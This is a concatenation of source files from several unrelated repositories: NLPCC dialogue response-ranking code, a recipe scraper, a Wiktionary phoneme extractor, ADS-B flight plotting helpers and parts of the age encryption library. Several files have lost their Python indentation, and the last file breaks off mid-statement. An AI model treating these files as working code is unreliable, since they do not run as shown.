return mrr_result,result_of_rnk
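# Illustrative example (assumed scores, 2 candidates per query, k=[1, 2]):
#   mrr_and_rnk([0.9, 0.1, 0.2, 0.7], [1, 0, 1, 0], response_num_per_query=2, k=[1, 2])
#   ->  (0.75, [0.5, 1.0])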
def precision_of_matching_1(pred_label,true_label,response_num_per_query=11):
assert len(pred_label)==len(true_label),'length not same'
p=0
sample_num=len(true_label)
right_q_num=0.0
total_q_num=0.0
while p<sample_num:
one_q_p=pred_label[p:p+response_num_per_query]
one_q_t=true_label[p:p+response_num_per_query]
right_index=[i for i in range(0,len(one_q_t)) if one_q_t[i]==1]
assert len(right_index)==1,'true label is not right'
tmp=one_q_p[right_index[0]]
index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex=[i for i in range(0,len(one_q_p)) if tmp<=one_q_p[i]]#
if len(index_of_value_of_bigger_than_valueof_oneqp_of_location_rightindex)==1:
right_q_num+=1
total_q_num+=1
p+=response_num_per_query
return right_q_num,total_q_num
def map_and_rnk(pred_score,true_label,response_num_per_query=11,k=[1,2,3,4,5]):
    #todo use this when a query can have multiple correct responses
pass
```
#### File: JoJoJun/NLPCC2018_Multi_Turn_Response_Selection/Layers.py
```python
import tensorflow as tf
import pickle
import utils
from tensorflow.contrib.layers import xavier_initializer
from tensorflow.contrib import rnn
from tensorflow.python.keras.preprocessing.sequence import pad_sequences
import numpy as np
class sp_interactive_layer:
def __init__(self,input_tensor,channels=2,filter_num=8,kernel_size=(3,3),pool_size=(2,2),strides=(2,2),con_times=1):
input_dims=input_tensor.shape[2]
self.W=tf.get_variable('sp_w',shape=(input_dims,channels,input_dims),
initializer=xavier_initializer(), dtype=tf.float32)
# input_tensor shape is (batchsize,m,n),we calculate an image with shape (batch_size,m,m,channels)
tmp = tf.tensordot(input_tensor, self.W, axes=[[2], [0]])#batchsize,m,channels,n
mv_t = tf.transpose(input_tensor, perm=[0, 2, 1])#batchsize,n,m
mv_t = tf.stack([mv_t] * channels, axis=1)#batchsize,channels,n,m
        matching_image = tf.matmul(tf.transpose(tmp, perm=[0, 2, 1, 3]), mv_t)#batchsize,channels,m,m
        matching_image = tf.transpose(matching_image, perm=[0, 2, 3, 1])#batchsize,m,m,channels
for i in range(0,con_times):
conv_layer = tf.layers.conv2d(matching_image, filters=filter_num, kernel_size=kernel_size, padding='VALID',
kernel_initializer=tf.contrib.keras.initializers.he_normal(),
activation=tf.nn.leaky_relu, name='conv_'+str(i)) # TODO: check other params
matching_image = tf.layers.max_pooling2d(conv_layer, pool_size=pool_size, strides=strides,
padding='VALID', name='max_pooling_'+str(i)) # TODO: check other params
self.final_matching_vector=tf.contrib.layers.flatten(matching_image)
def call(self):
return self.final_matching_vector
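# Hedged usage sketch (illustrative only; the tensor names and sizes below are
# assumptions, not part of the original repository). The layer expects a rank-3
# input of shape (batch_size, m, n) and flattens the pooled matching image:
#
#   inputs = tf.placeholder(tf.float32, shape=(None, 50, 200))
#   layer = sp_interactive_layer(inputs, channels=2, filter_num=8)
#   matching_vector = layer.call()  # shape (batch_size, flattened_dim)
#
# Note that tf.get_variable('sp_w', ...) means the layer can only be built once
# per variable scope unless reuse is enabled.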
```
#### File: JoJoJun/NLPCC2018_Multi_Turn_Response_Selection/preprocess_for_test_nlpcc2018.py
```python
import random
from Tokenizer import Tokenizer
import numpy as np
import pickle
import word2vec
import Evaluate
def load_context_data(path='./nlpcc2018test/seq_context.txt'):
contexts=[]
with open(path,'r',encoding='utf-8') as f:
a_context=[]
for line in f:
string=line.strip('\r\n').strip('\n')
if len(string)==0:
if len(a_context)==0:
continue
else:
contexts.append(a_context)
a_context=[]
else:
a_context.append(string)
return contexts
def load_responses_data(path='./nlpcc2018test/seq_replies.txt'):
all_context_responses=[]
with open(path,'r',encoding='utf-8') as f:
one_context_responses=[]
for line in f:
string=line.strip('\r\n').strip('\n')
if len(string)==0:
if len(one_context_responses)==0:
continue
else:
all_context_responses.append(one_context_responses)
one_context_responses=[]
else:
one_context_responses.append(string)
return all_context_responses
def gen_raw_test_data(store_path='./nlpcc2018test/test.raw.pkl',add_sen=False):
contexts=load_context_data()
all_context_response=load_responses_data()
assert len(contexts)==len(all_context_response),'test data num error'
tmp=np.array([len(r) for r in all_context_response])
wrong_index=[i for i in range(0,len(tmp)) if tmp[i]!=10]
wrong_contents=[all_context_response[i] for i in range(0,len(tmp)) if tmp[i]!=10]
if add_sen:
        addition_string = 'nlpcc2018错误,异常。补齐候选句子。aaaaaa'  # placeholder meaning "nlpcc2018 error/anomaly; pad the candidate sentences", plus filler characters
        for i in range(0,len(tmp)):
            if tmp[i]!=10:  # checked: each nlpcc2018 context has either 10 or 9 candidate replies; the few with 9 are erroneous
all_context_response[i].append(addition_string)
new_context=[]
new_response=[]
for i in range(0,len(contexts)):
for j in range(0,tmp[i]):
new_context.append(contexts[i])
for context_responses in all_context_response:
for r in context_responses:
new_response.append(r)
assert len(new_context)==len(new_response),'new_context or new_response length error'
pickle.dump([new_context,new_response],open(store_path,'wb+'),protocol=True)
pickle.dump(tmp,open('./nlpcc2018test/reponses_num_of_context.pkl','wb+'),protocol=True)
pickle.dump([wrong_contents,wrong_index], open('./nlpcc2018test/wrong_contents_and_index.pkl', 'wb+'), protocol=True)
return new_context,new_response
def get_seged_test_data(raw_data,store_path='./nlpcc2018test/test.seg.pkl'):
raw_context, raw_response=raw_data
tokenizer=Tokenizer()
seged_context=[]
seged_response=[]
for con in raw_context:
one_seged_con=[]
for utt in con:
one_seged_con.append(tokenizer.parser(utt).split())
seged_context.append(one_seged_con)
for r in raw_response:
seged_response.append(tokenizer.parser(r).split())
pickle.dump([seged_context,seged_response],open(store_path,'wb+'),protocol=True)
return seged_context,seged_response
def get_final_test_data_without_unk(seg_context,seg_response,word_dict,store_path='./nlpcc2018test/test.pkl'):
index_context=[]
index_response=[]
for con in seg_context:
index_one_con=[]
for utt in con:
index_one_utt=[word_dict[word] for word in utt if word in word_dict]
index_one_con.append(index_one_utt)
index_context.append(index_one_con)
for r in seg_response:
index_one_r=[word_dict[word] for word in r if word in word_dict]
index_response.append(index_one_r)
pickle.dump([index_context,index_response],open(store_path,'wb+'),protocol=True)
def load_word_embedding():
# word_embedding:[clusters=None,vectors,vocab,vocab_hash]
word_embedding = word2vec.load('./data/word_embedding.bin')
return word_embedding
def gen_result_readable():
reponses_num_of_context=pickle.load(open('./nlpcc2018test/reponses_num_of_context.pkl','rb'))
final_result=pickle.load(open('./nlpcc2018result/final.pkl','rb'))
contexts = load_context_data()
all_context_response = load_responses_data()
p=0
with open('./nlpcc2018result/final.readable.txt','w+') as f:
for i in range(0,len(contexts)):
num=reponses_num_of_context[i]
tmp=final_result[p:p+num]
tmp=[[tmp[i],i] for i in range(0,len(tmp))]
tmp.sort(reverse=True)
f.write('id='+str(i)+'\n')
for utt in contexts[i]:
f.write(utt+'\n')
f.write('responses ranking:\n')
for score,index in tmp:
f.write(str(index)+' '+str(score)+' '+all_context_response[i][index]+'\n')
f.write('\n')
p+=num
assert p==len(final_result),'gen_result_readable error'
def load_true_label():
label=[]
with open('./nlpcc2018result/sub2-index.txt') as f:
for line in f:
label.append(int(line.strip('\r\n').strip('\n')))
return label
if __name__=='__main__':
#gen_raw_test_data()
#seg_context,seg_response=get_seged_test_data(gen_raw_test_data(add_sen=False))
#word_embedding=load_word_embedding()
#get_final_test_data_without_unk(seg_context=seg_context,seg_response=seg_response,word_dict=word_embedding.vocab_hash)
#gen_result_readable()
label = load_true_label()
all_result = pickle.load(open('./nlpcc2018result/all.pkl', 'rb'))
wrong_contents_and_index=pickle.load(open('./nlpcc2018test/wrong_contents_and_index.pkl','rb'))
test_raw=pickle.load(open('./nlpcc2018test/test.raw.pkl','rb'))
final_result = pickle.load(open('./nlpcc2018result/final.pkl', 'rb'))
new_all_rst = []
for rst in all_result[0]:
tmp = list(rst)
new_all_rst.append(tmp)
new_final_result=list(final_result)
for index in wrong_contents_and_index[1]:
for rst in new_all_rst:
rst.insert(index*10+9,0.0)
new_final_result.insert(index*10+9,0.00001)
new_label=[]
for l in label:
new_label+=[int(l==i) for i in range(0,10)]
for i in range(0,len(all_result[0])):
print(Evaluate.mrr_and_rnk(new_all_rst[i],new_label,response_num_per_query=10))
print(Evaluate.mrr_and_rnk(new_final_result,new_label,response_num_per_query=10))
print('all work has finished')
``` |
{
"source": "jojolebarjos/food-ontology",
"score": 3
} |
#### File: parser/classifier/classifier.py
```python
import asyncio
# Abstract asynchronous classifier interface
class Classifier:
# Provide annotation for specified texts
async def classify(self, texts):
raise NotImplementedError()
# Ask for retraining (old model should be available during training)
async def train(self):
pass
```
#### File: parser/classifier/delay.py
```python
import asyncio
from .classifier import Classifier
# Chain coroutines
async def then(fence, task):
await fence
return await task
# Avoid overlapping training sessions
class DelayedClassifier(Classifier):
def __init__(self, classifier):
self._classifier = classifier
self._lock = asyncio.Lock()
self._training_future = None
self._pending_future = None
# Annotate given samples
async def classify(self, texts):
return await self._classifier.classify(texts)
# Schedule training session
async def train(self):
async with self._lock:
# If no training session is running, just do it
if self._training_future is None:
future = asyncio.ensure_future(self._train())
self._training_future = future
# Otherwise, if there is no session scheduled, prepare it
elif self._pending_future is None:
future = asyncio.ensure_future(then(self._training_future, self._classifier.train()))
self._pending_future = future
# Otherwise, just wait on scheduled training
else:
future = self._pending_future
# Wait for it
return await future
# Train and then trigger any scheduled session
async def _train(self):
status = await self._classifier.train()
async with self._lock:
self._training_future = self._pending_future
self._pending_future = None
return status
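# Hedged usage sketch (illustrative only; EchoClassifier is a made-up stand-in,
# not part of this repository). Concurrent train() calls collapse into at most
# one running session plus one pending session:
#
#   class EchoClassifier(Classifier):
#       async def classify(self, texts):
#           return [None for _ in texts]
#       async def train(self):
#           await asyncio.sleep(0.1)
#           return "trained"
#
#   async def main():
#       clf = DelayedClassifier(EchoClassifier())
#       await asyncio.gather(clf.train(), clf.train(), clf.train())
#
#   asyncio.get_event_loop().run_until_complete(main())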
```
#### File: food/scraper/epicurious.py
```python
import scrapy
# Basic crawler for Epicurious recipes
class EpicuriousSpider(scrapy.Spider):
name = 'epicurious'
# Acquire all recipes in expected identifier range
def start_requests(self):
for id in range(1, 6010):
yield scrapy.Request('https://www.epicurious.com/recipes/food/views/%d' % id)
# Do the parsing
def parse(self, response):
# Get main identifiers
url = response.url
try:
id = int(url[url.rindex('-')+1:])
except:
return
# Get title
title = response.selector.xpath('//h1/text()').extract_first()
title = title.strip()
# Source
# TODO author/date/source...
# Rating
rating_min = response.selector.xpath('//*[@itemprop="worstRating"]/@content').extract_first()
rating_max = response.selector.xpath('//*[@itemprop="bestRating"]/@content').extract_first()
rating_value = response.selector.xpath('//*[@itemprop="ratingValue"]/@content').extract_first()
rating = float(rating_value) / (float(rating_max) - float(rating_min))
# Get description
description = response.selector.xpath('//*[@itemprop="description"]/p/text()').extract_first()
# Yield
servings = response.selector.xpath('//*[@itemprop="recipeYield"]/text()').extract_first()
# Ingredients
# TODO might use class="ingredient-group" to get subgroups
ingredients = response.selector.xpath('//*[@itemprop="ingredients"]/text()').extract()
# Preparation
# TODO directives
# Nutritional information
calories = response.selector.xpath('//*[@itemprop="calories"]/text()').extract_first()
carbohydrates = response.selector.xpath('//*[@itemprop="carbohydrateContent"]/text()').extract_first()
fat = response.selector.xpath('//*[@itemprop="fatContent"]/text()').extract_first()
protein = response.selector.xpath('//*[@itemprop="proteinContent"]/text()').extract_first()
sodium = response.selector.xpath('//*[@itemprop="sodiumContent"]/text()').extract_first()
polyunsaturated_fat = response.selector.xpath('//*[text()="Polyunsaturated Fat"]/../*[@class="nutri-data"]/text()').extract_first()
fiber = response.selector.xpath('//*[@itemprop="fiberContent"]/text()').extract_first()
monounsaturated_fat = response.selector.xpath('//*[text()="Monounsaturated Fat"]/../*[@class="nutri-data"]/text()').extract_first()
cholesterol = response.selector.xpath('//*[@itemprop="cholesterolContent"]/text()').extract_first()
# Tags
tags = response.selector.xpath('//*[@itemprop="recipeCategory"]/text()').extract()
# Return result
yield {
'id' : id,
'url' : url,
'title' : title,
'ingredients' : ingredients
# TODO more properties
}
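# Hedged usage note: assuming this file lives in the spiders/ package of a
# configured Scrapy project (project setup not shown here), the crawl would
# typically be launched from the project root with something like:
#   scrapy crawl epicurious -o recipes.json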
``` |
{
"source": "jojolebarjos/wiktionary-phoneme",
"score": 3
} |
#### File: jojolebarjos/wiktionary-phoneme/extract.py
```python
import io
import os
import bz2
from lxml import etree
from tqdm import tqdm
import re
import csv
#
# English-specific parser
#
# Common pronunciation definition
# * {{a|RP}} {{IPA|/pɔːtˈmæn.təʊ/|lang=en}}
# * {{a|US}} {{enPR|pôrtmă'ntō}}, {{IPA|/pɔːɹtˈmæntoʊ/|lang=en}}; {{enPR|pô'rtmăntōʹ}}, {{IPA|/ˌpɔːɹtmænˈtoʊ/|lang=en}}
# * {{a|Portugal}} {{IPA|/ˈfɾɐj/|/ˈfɾej/|lang=pt}}
# * {{a|US|UK}} {{IPA|/kæt/|[kʰæt]|[kʰæt̚]|lang=en}}
# * {{a|Munster|Aran}} {{IPA|/kɑt̪ˠ/|lang=ga}}
r_en_ipa = re.compile(r'\{\{IPA\|\/([^\/]*)\/.*?(?:lang=([^\}]*))?\}\}', re.UNICODE)
# Extract phonemes from the whole article
def parse_en(title, text):
# Iterate over lines
results = []
for line in text.split('\n'):
# Check standard pronunciation definition
match = r_en_ipa.search(line)
if match is not None:
pronunciation = match.group(1)
language = match.group(2) or ''
result = (title, language, pronunciation)
results.append(result)
# Ready
return results
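# Illustrative example: for an article titled 'portmanteau' containing the sample
# line shown above ("* {{a|RP}} {{IPA|/pɔːtˈmæn.təʊ/|lang=en}}"), parse_en would
# return [('portmanteau', 'en', 'pɔːtˈmæn.təʊ')].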
#
# French-specific parser
#
# Common pronunciation definition
# * {{pron|ʃɛz|fr}}
# TODO
# Common pronunciation definition, with text
# '''lire''' {{pron|liʁ|fr}}
# '''manga''' {{pron|mɑ̃.ɡa|fr}}
r_fr_pron_long = re.compile(r'\'\'\'([^\{]*)\'\'\'\s*\{\{pron\|([^\|]*)\|([^\}]*)\}\}', re.UNICODE)
# Alternative pronunciation definition
# {{fr-rég|mœbl}}
# {{en-nom-rég|ˌɑː(ɹ)m.ˈtʃeə(ɹ)}}
# TODO r_fr_reg = re.compile(r'\{\{([^\-]*)\-[^\|]*rég\|([^\}]*)\}\}', re.UNICODE)
# Extract phonemes from the whole article
def parse_fr(title, text):
# Iterate over lines
results = []
for line in text.split('\n'):
# Check standard pronunciation definition
match = r_fr_pron_long.search(line)
if match is not None:
text = match.group(1)
pronunciation = match.group(2)
language = match.group(3)
result = (text, language, pronunciation)
results.append(result)
# Ready
return results
#
# German-specific parser
#
# Word/language header
# == Liebe ({{Sprache|Deutsch}}) ==
r_de_header = re.compile(r'\s*==\s*[^=]*?\s*\(\s*\{\{Sprache\|([^\}]*)\}\}\s*\)\s*==\s*', re.UNICODE)
# Common pronunciation definition
# {{Aussprache}}
# :{{IPA}} {{Lautschrift|aˈpʀɪl}}
# :{{IPA}} {{Lautschrift|ˈɔʁdoː}}, {{Pl.}} {{Lautschrift|ˈɔʁdineːs}}
# :{{IPA}} ''östlich:'' {{Lautschrift|səˈɾiə}}, ''westlich:'' {{Lautschrift|seˈɾia}}
# :{{IPA}} {{Lautschrift|ˈtʀiːbʊs}}, <!-- Spezialfall, NICHT löschen -->{{Pl.1}} {{Lautschrift|ˈtʀiːbuːs}}
r_de_ipa = re.compile(r'\:\{\{IPA\}\}\s*\{\{Lautschrift\|([^\}]+)\}\}', re.UNICODE)
# German names to ISO 639-1 Codes (used by Wikipedia)
m_de_languages = {
'Englisch' : 'en',
'Französisch' : 'fr',
'Deutsch' : 'de',
'Italienisch' : 'it',
'Latein' : 'la',
'Spanisch' : 'es'
# TODO handle more language codes
}
# Extract phonemes from the whole article
def parse_de(title, text):
# Iterate over lines
language = ''
results = []
for line in text.split('\n'):
# Check for header, update current word and language
match = r_de_header.search(line)
if match is not None:
language = match.group(1)
language = m_de_languages.get(language, '')
# Check standard pronunciation definition
match = r_de_ipa.search(line)
if match is not None:
pronunciation = match.group(1)
result = (title, language, pronunciation)
results.append(result)
# Ready
return results
#
# Italian-specific
#
# Language header
# == {{-it-}} ==
# == {{-la-}} ==
r_it_header = re.compile(r'\s*==\s*\{\{\-(.*?)\-\}\}\s*==\s*', re.UNICODE)
# Common pronunciation definition
# * {{IPA|/ˈkaː.za/|/ˈkaː.sa/}}
# {{IPA|/inforˈmatika/}}
# {{IPA|/'libero/}}
r_it_ipa = re.compile(r'\{\{IPA\|\/(.*?)\/.*?\}\}', re.UNICODE)
# Extract phonemes from the whole article
def parse_it(title, text):
# Iterate over lines
language = ''
results = []
for line in text.split('\n'):
# Check for header, update current word and language
match = r_it_header.search(line)
if match is not None:
language = match.group(1)
# Check standard pronunciation definition
match = r_it_ipa.search(line)
if match is not None:
pronunciation = match.group(1)
result = (title, language, pronunciation)
results.append(result)
# Ready
return results
#
# Main process
#
# Get local directory
here = os.path.dirname(os.path.realpath(__file__))
# Iterate over pages in a BZ2 Wikipedia/Wiktionary dump
def iterate(path):
with bz2.open(path) as file:
title = None
ns = None
text = None
# For each node
for action, elem in etree.iterparse(file):
tag = elem.tag
if '}' in tag:
tag = tag[tag.rindex('}') + 1:]
# Keep relevant information
if tag == 'title':
title = elem.text
elif tag == 'ns':
ns = elem.text
elif tag == 'text':
text = elem.text
# When a page is complete, export it
elif tag == 'page':
if title is not None and ns == '0' and text is not None:
yield title, text
title = None
ns = None
text = None
# Free memory
del elem.getparent()[0]
# Process Wiktionary dump and extract phonetic information
def process(lang):
# Select parser
parse = {
'en' : parse_en,
'fr' : parse_fr,
'de' : parse_de,
'it' : parse_it
}[lang]
# Assume latest dump in same directory
input_path = os.path.join(here, '%swiktionary-latest-pages-articles.xml.bz2' % lang)
# Open output CSV file
output_path = os.path.join(here, '%s.csv' % lang)
with io.open(output_path, 'w', newline='', encoding='utf-8') as output_file:
writer = csv.writer(output_file)
writer.writerow(['WORD', 'LANGUAGE', 'PRONUNCIATION'])
# Stream and parse input dump
for title, text in tqdm(iterate(input_path)):
results = parse(title, text)
results = {result for result in results if result[2] != ''}
for result in sorted(results):
writer.writerow(result)
# Standalone usage does the export process
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Extract phonemes from Wiktionary BZ2 dump.')
parser.add_argument('language', help='language code (en, fr, de, it)')
args = parser.parse_args()
process(args.language)
``` |
{
"source": "jojonas/py1090",
"score": 3
} |
#### File: py1090/examples/example_helpers.py
```python
def calculate_map_bounds(lats, lons, fraction=1):
import numpy as np
latrange = np.max(lats) - np.min(lats)
lonrange = np.max(lons) - np.min(lons)
padding = fraction * max(latrange, lonrange)
result = {}
result['llcrnrlat'] = max(np.min(lats) - padding, -90)
result['urcrnrlat'] = min(np.max(lats) + padding, 90)
    result['llcrnrlon'] = max(np.min(lons) - padding, -180)
    result['urcrnrlon'] = min(np.max(lons) + padding, 180)
print(result)
return result
def example_data_file():
import sys, os.path
if len(sys.argv) > 1:
filename = sys.argv[1]
if not os.path.isfile(filename):
raise IOError("File '{filename:s}' does not exist.".format(filename=filename))
else:
filename = 'example_recording.txt'
if not os.path.isfile(filename):
raise IOError("Run example 'record_raw_to_file.py' to create a sample flight recording first.")
return filename
map_bounds = {
"europe": {
"urcrnrlat": 70,
"urcrnrlon": 40,
"llcrnrlat": 35,
"llcrnrlon": -15,
},
"usa": {
"urcrnrlat": 50,
"urcrnrlon": -65,
"llcrnrlat": 23,
"llcrnrlon": -125,
},
"canada": {
"urcrnrlat": 75,
"urcrnrlon": -55,
"llcrnrlat": 45,
"llcrnrlon": -140,
}
}
blacklist_hexidents = (
'406B88',
'400C7D',
'400584',
'405F12',
)
```
#### File: py1090/examples/plot_basemap_polar.py
```python
import sys, os.path
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
import os.path
import math
from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
import py1090
from py1090.helpers import distance_between, bearing_between
from example_helpers import calculate_map_bounds, blacklist_hexidents, example_data_file
def basemap_plot_distances(filename, home):
# number of sections
N = 120
bins = np.zeros(N)
collection = py1090.FlightCollection()
#with py1090.Connection() as file:
with open(filename, 'r') as file:
collection.add_list(file)
for flight in collection:
if flight.hexident in blacklist_hexidents:
continue
for lat, lon, alt in flight.path:
bearing = bearing_between(home[0], home[1], lat, lon)
distance = distance_between(home[0], home[1], lat, lon)
if distance > 500e3:
print("Warning: coordinates", lat, ",", lon, "sent by plane", flight.hexident, "are very far away, skipping for now, you may consider blacklisting though.")
continue
bin = round(bearing * N / (2*math.pi)) % N
if distance > bins[bin]:
bins[bin] = distance
m = Basemap(projection='stere', resolution='i', lat_0=home[0], lon_0=home[1], width=bins.max()*2, height=bins.max()*2)
fig = plt.figure()
ax_map = fig.add_subplot(111)
m.drawcoastlines()
m.fillcontinents(color='white', lake_color='white')
m.drawcountries()
ax_polar = fig.add_axes(ax_map.get_position(), polar=True, frameon=False)
ax_polar.set_autoscale_on(False)
ax_polar.set_ylim(0, bins.max()/1000)
ax_polar.fill(np.linspace(0, 2*math.pi, N) - math.pi/2, bins/1000, alpha=0.5)
ax_polar.xaxis.set_ticklabels([])
plt.title("Maximal distance: {:.1f} km".format(bins.max() / 1000))
plt.show()
if __name__ == "__main__":
filename = example_data_file()
home = (50.775346, 6.083887)
basemap_plot_distances(filename, home)
```
#### File: py1090/examples/record_raw_to_file.py
```python
import sys, os.path
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..'))
import py1090
def record_positions_to_file(filename):
with py1090.Connection() as connection, open(filename, 'a') as file:
lines = 0
for line in connection:
message = py1090.Message.from_string(line)
if message.latitude and message.longitude:
file.write(line)
lines += 1
print("Recorded lines:", lines)
if __name__ == "__main__":
record_positions_to_file("example_recording.txt")
```
#### File: py1090/py1090/helpers.py
```python
import math
EARTH_RADIUS = 6371008.7714 # m
r"""The average earth radius :math:`R_0`. It is defined as the mean radius of the semi-axes.
The values are taken from the WGS 84 (World Geodetic System 1984) ellipsoid
`(definition of the Department Of Defense, Jan. 2000, p. 37) <http://earth-info.nga.mil/GandG/publications/tr8350.2/wgs84fin.pdf>`_ .
.. math::
R_0 = 6371008.7714 \mathrm{m}
"""
def distance_between(lat1, lon1, lat2, lon2):
r"""Calculates the distance between two locations, in meters, using the `Haversine <http://en.wikipedia.org/wiki/Haversine_formula>`_
formula.
The bearing between latitude, longitude: :math:`(\phi_1, \lambda_1)` and :math:`(\phi_2, \lambda_2)` is given by
.. math::
a = \sin^2(\frac{\phi_2 - \phi_1}{2}) + \cos(\phi_1) \cos(\phi_2) \sin^2(\frac{\lambda_2 - \lambda_1}{2})
d = 2 R_0 \cdot \mathrm{atan2}(\sqrt{a}, \sqrt{1-a})
The earth radius :math:`R_0` is taken to be :py:data:`py1090.helpers.EARTH_RADIUS`. The approximation of a spherical earth is made.
Args:
lat1 (float): :math:`\phi_1`, the latitude of the reference location
lon1 (float): :math:`\lambda_1`, the longitude of the reference location
lat2 (float): :math:`\phi_2`, the latitude of the target location
lon2 (float): :math:`\lambda_2`, the longitude of the target location
Returns:
float: the distance in meters.
"""
lambda1 = math.radians(lon1)
lambda2 = math.radians(lon2)
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
dphi = phi2-phi1
dlambda = lambda2-lambda1
a = math.pow(math.sin(dphi/2), 2) + math.cos(phi1)*math.cos(phi2)*math.pow(math.sin(dlambda/2), 2)
dsigma = 2*math.atan2(math.sqrt(a), math.sqrt(1-a))
distance = EARTH_RADIUS * dsigma
return distance
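# Quick sanity check (illustrative): two antipodal points on the equator are half
# the great circle apart, so distance_between(0.0, 0.0, 0.0, 180.0) returns
# pi * EARTH_RADIUS, roughly 2.0015e7 m.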
def bearing_between(lat1, lon1, lat2, lon2):
r"""Calculates the bearing angle between two locations, in radians.
The bearing between latitude, longitude: :math:`(\phi_1, \lambda_1)` and :math:`(\phi_2, \lambda_2)` is given by
.. math::
\mathrm{atan2}(\sin(\lambda_2 - \lambda_1) \cos(\phi_1), \cos(\phi_2) \sin(\phi_1) - \sin(\phi_2) \cos(\phi_2) \cos(\lambda_2 - \lambda_1))
Args:
lat1 (float): :math:`\phi_1`, the latitude of the reference location
lon1 (float): :math:`\lambda_1`, the longitude of the reference location
lat2 (float): :math:`\phi_2`, the latitude of the target location
lon2 (float): :math:`\lambda_2`, the longitude of the target location
Returns:
float: the bearing angle in radians, between :math:`-\pi` and :math:`\pi`.
"""
lambda1 = math.radians(lon1)
lambda2 = math.radians(lon2)
phi1 = math.radians(lat1)
phi2 = math.radians(lat2)
dphi = phi2-phi1
dlambda = lambda2-lambda1
bearing = math.atan2(math.sin(dlambda)*math.cos(phi1), \
math.cos(phi2)*math.sin(phi1)-math.sin(phi2)*math.cos(phi1)*math.cos(dlambda))
return bearing
def knots_to_kmh(knots):
"""Converts velocity in knots to velocity in km/h.
1 knot is 1 nm/h (nautical mile per hour) and 1.852 km/h.
Args:
knots (float): velocity in knots
Returns:
float: velocity in km/h
"""
return 1.852*knots
def knots_to_mps(knots):
"""Converts velocity in knots to velocity in m/s (meters per second).
    1 knot is 1 nm/h (nautical mile per hour), 1.852 km/h and about 0.514 m/s.
Args:
knots (float): velocity in knots
Returns:
float: velocity in m/s
"""
    kmh = knots_to_kmh(knots)
    return kmh / 3.6
``` |
{
"source": "jojonas/pyage",
"score": 2
} |
#### File: age/algorithms/ssh_ed25519.py
```python
import typing
from age.algorithms.x25519 import _x25519_decrypt_file_key2, x25519_encrypt_file_key
from age.keys.agekey import AgePublicKey
from age.keys.ed25519 import Ed25519PrivateKey, Ed25519PublicKey
from age.primitives.hashes import sha256
from age.primitives.hkdf import hkdf
from age.primitives.x25519 import ECPoint, ECScalar, x25519_reduce, x25519_scalarmult
AGE_ED25519_LABEL = b"age-encryption.org/v1/ssh-ed25519"
def _tweak(ssh_key: bytes) -> ECScalar:
return x25519_reduce(ECScalar(hkdf(salt=ssh_key, label=AGE_ED25519_LABEL, key=b"", len=64)))
def ssh_ed25519_encrypt_file_key(
ed25519_public_key: Ed25519PublicKey, file_key: bytes
) -> typing.Tuple[bytes, ECPoint, bytes]:
ssh_key = ed25519_public_key.binary_encoding()
public_key_fingerprint = sha256(ssh_key)[:4]
age_public_key = ed25519_public_key.to_age_public_key()
pk_conv: ECPoint = age_public_key.public_bytes()
pk_conv_tweak: ECPoint = x25519_scalarmult(_tweak(ssh_key), pk_conv)
public_key = AgePublicKey.from_public_bytes(pk_conv_tweak)
derived_secret, encrypted_file_key = x25519_encrypt_file_key(public_key, file_key)
return public_key_fingerprint, derived_secret, encrypted_file_key
def ssh_ed25519_decrypt_file_key(
ed25519_private_key: Ed25519PrivateKey,
fingerprint: bytes,
derived_secret: ECPoint,
encrypted_file_key: bytes,
):
ssh_key = ed25519_private_key.public_key().binary_encoding()
expected_fingerprint = sha256(ssh_key)[:4]
if fingerprint != expected_fingerprint:
raise ValueError("Wrong SSH-ED25519 public key")
tweak = _tweak(ssh_key)
age_private_key = ed25519_private_key.to_age_private_key()
pk_conv: ECPoint = age_private_key.public_key().public_bytes()
pk_conv_tweak: ECPoint = x25519_scalarmult(tweak, pk_conv)
derived_secret_tweak = x25519_scalarmult(tweak, derived_secret)
salt = derived_secret + pk_conv_tweak
return _x25519_decrypt_file_key2(
private_key=age_private_key,
derived_secret=derived_secret_tweak,
encrypted_file_key=encrypted_file_key,
salt=salt,
)
```
#### File: age/algorithms/ssh_rsa.py
```python
import typing
from age.keys.rsa import RSAPrivateKey, RSAPublicKey
from age.primitives.hashes import sha256
from age.primitives.rsa_oaep import rsa_decrypt, rsa_encrypt
AGE_RSA_PADDING_LABEL = b"age-encryption.org/v1/ssh-rsa"
def ssh_rsa_encrypt_file_key(
public_key: RSAPublicKey, file_key: bytes
) -> typing.Tuple[bytes, bytes]:
public_key_fingerprint = sha256(public_key.binary_encoding())[:4]
encrypted_file_key = rsa_encrypt(
public_key=public_key, label=AGE_RSA_PADDING_LABEL, plaintext=file_key
)
return public_key_fingerprint, encrypted_file_key
def ssh_rsa_decrypt_file_key(
private_key: RSAPrivateKey, fingerprint: bytes, encrypted_file_key: bytes
) -> bytes:
expected_fingerprint = sha256(private_key.public_key().binary_encoding())[:4]
if fingerprint != expected_fingerprint:
raise ValueError("Wrong SSH-RSA public key")
return rsa_decrypt(
private_key=private_key, label=AGE_RSA_PADDING_LABEL, ciphertext=encrypted_file_key
)
```
#### File: age/algorithms/x25519_test.py
```python
import os
from age.algorithms.x25519 import x25519_decrypt_file_key, x25519_encrypt_file_key
from age.keys.agekey import AgePrivateKey
def test_x25519_algorithm():
key = AgePrivateKey.generate()
file_key = os.urandom(16)
args = x25519_encrypt_file_key(key.public_key(), file_key)
decrypted = x25519_decrypt_file_key(key, *args)
assert decrypted == file_key
```
#### File: src/age/cli_test.py
```python
import datetime
import io
import os.path
import sys
from contextlib import contextmanager
from unittest import mock
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from pytest import raises
from age.cli import decrypt, encrypt, generate
TEST_KEY = "<KEY>"
TEST_KEY_PUBLIC = "<KEY>"
TEST_KEY_RAW = bytes.fromhex("<KEY>")
TEST_PLAINTEXT = b"Hello World!"
TEST_CIPHERTEXT = (
b"age-encryption.org/v1\n-> X25519 FMqeTTh7zPNXRuBAfaqsxrKKT4RF71pRWIlNuYPiQHA\nCtufbJCyj2JplnG6Rg3RHy6rJOUOE+Rqv8RGWoYWXlg\n--- gY9WMTjF1pksYSXC7xCFZGpiQH8frzkzKj1EG6Ql+gI\n"
+ bytes.fromhex(
